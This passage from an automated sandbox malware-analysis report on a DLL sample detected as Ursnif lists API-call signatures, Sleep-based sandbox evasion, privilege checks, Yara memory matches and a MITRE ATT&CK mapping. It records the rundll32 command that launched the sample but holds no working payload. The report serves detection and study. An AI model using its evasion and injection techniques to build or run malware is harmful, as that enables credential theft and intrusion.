            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Found stalling execution ending in API Sleep callShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeStalling execution: Execution stalls by calling Sleep
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2620Thread sleep count: 170 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2620Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
            Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C732BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00C732BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_040832BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_040832BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047B32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,6_2_047B32BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04BF32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,9_2_04BF32BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04C032BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,12_2_04C032BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_043532BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,16_2_043532BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_067732BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,18_2_067732BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04FD32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,21_2_04FD32BA
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C2009C mov eax, dword ptr fs:[00000030h]0_2_00C2009C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C203AC mov eax, dword ptr fs:[00000030h]0_2_00C203AC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C20476 mov eax, dword ptr fs:[00000030h]0_2_00C20476
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D0476 mov eax, dword ptr fs:[00000030h]3_2_005D0476
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D009C mov eax, dword ptr fs:[00000030h]3_2_005D009C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D03AC mov eax, dword ptr fs:[00000030h]3_2_005D03AC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0098009C mov eax, dword ptr fs:[00000030h]16_2_0098009C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00980476 mov eax, dword ptr fs:[00000030h]16_2_00980476
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_009803AC mov eax, dword ptr fs:[00000030h]16_2_009803AC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_045A0476 mov eax, dword ptr fs:[00000030h]18_2_045A0476
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_045A009C mov eax, dword ptr fs:[00000030h]18_2_045A009C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_045A03AC mov eax, dword ptr fs:[00000030h]18_2_045A03AC
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1Jump to behavior
            Source: loaddll32.exe, 00000000.00000002.523347599.00000000011C0000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.525806638.0000000003620000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.524902002.0000000002BC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000000.00000002.523347599.00000000011C0000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.525806638.0000000003620000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.524902002.0000000002BC0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: loaddll32.exe, 00000000.00000002.523347599.00000000011C0000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.525806638.0000000003620000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.524902002.0000000002BC0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
            Source: loaddll32.exe, 00000000.00000002.523347599.00000000011C0000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.525806638.0000000003620000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.524902002.0000000002BC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
            Source: loaddll32.exe, 00000000.00000002.523347599.00000000011C0000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.525806638.0000000003620000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.524902002.0000000002BC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C793D5 cpuid 0_2_00C793D5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005F179C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_005F179C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005F10FC GetSystemTimeAsFileTime,_aulldiv,_snwprintf,wvsprintfA,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_005F10FC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C793D5 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_00C793D5

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000015.00000003.355232631.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314377890.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391622099.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314521084.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355592572.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314475815.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.367003924.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391468389.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370680495.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311090164.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313451317.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370551662.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391668872.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314245766.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391696489.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391496685.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355040596.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314318653.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311152381.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391727857.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311865061.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311345831.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391695930.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.311422020.0000000006CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.370336241.0000000006AE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311203958.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.313929901.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311769510.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311540194.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314268795.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355268021.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.361195316.00000000074A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391358945.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370621844.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311670564.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313872965.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391766298.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311984449.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.312268208.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314181933.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391634804.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313395188.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366812647.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355464241.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366846077.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370930604.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.528368895.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.525372552.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311633818.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.328237107.0000000005588000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.526965041.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366987894.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370755681.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.346412042.0000000006C48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370579660.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314563024.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355144752.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366907200.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391423871.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.354973566.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313701626.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391783104.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391671709.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366961006.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311364814.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366875687.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313576458.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311042721.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391794887.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370911517.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391520743.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311282599.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355518422.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.310694636.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391596036.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314078107.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314146839.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311573394.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370793730.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.527384744.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.367026517.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2880, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3556, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5040, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6536, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7000, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1496, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000015.00000003.355232631.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314377890.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391622099.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314521084.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355592572.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314475815.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.367003924.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391468389.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370680495.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311090164.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313451317.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370551662.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391668872.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314245766.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391696489.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391496685.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355040596.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314318653.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311152381.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391727857.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311865061.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311345831.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391695930.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.311422020.0000000006CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.370336241.0000000006AE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311203958.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.313929901.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311769510.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311540194.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314268795.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355268021.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.361195316.00000000074A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391358945.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370621844.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311670564.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313872965.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391766298.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311984449.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.312268208.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314181933.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391634804.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313395188.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366812647.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355464241.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366846077.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370930604.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.528368895.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.525372552.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311633818.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.328237107.0000000005588000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.526965041.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366987894.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370755681.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.346412042.0000000006C48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370579660.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314563024.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355144752.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366907200.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391423871.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.354973566.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313701626.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391783104.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391671709.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366961006.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311364814.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366875687.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313576458.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311042721.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391794887.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370911517.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391520743.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311282599.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355518422.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.310694636.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391596036.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314078107.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314146839.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311573394.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370793730.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.527384744.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.367026517.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2880, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3556, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5040, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6536, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7000, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1496, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsNative API1Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
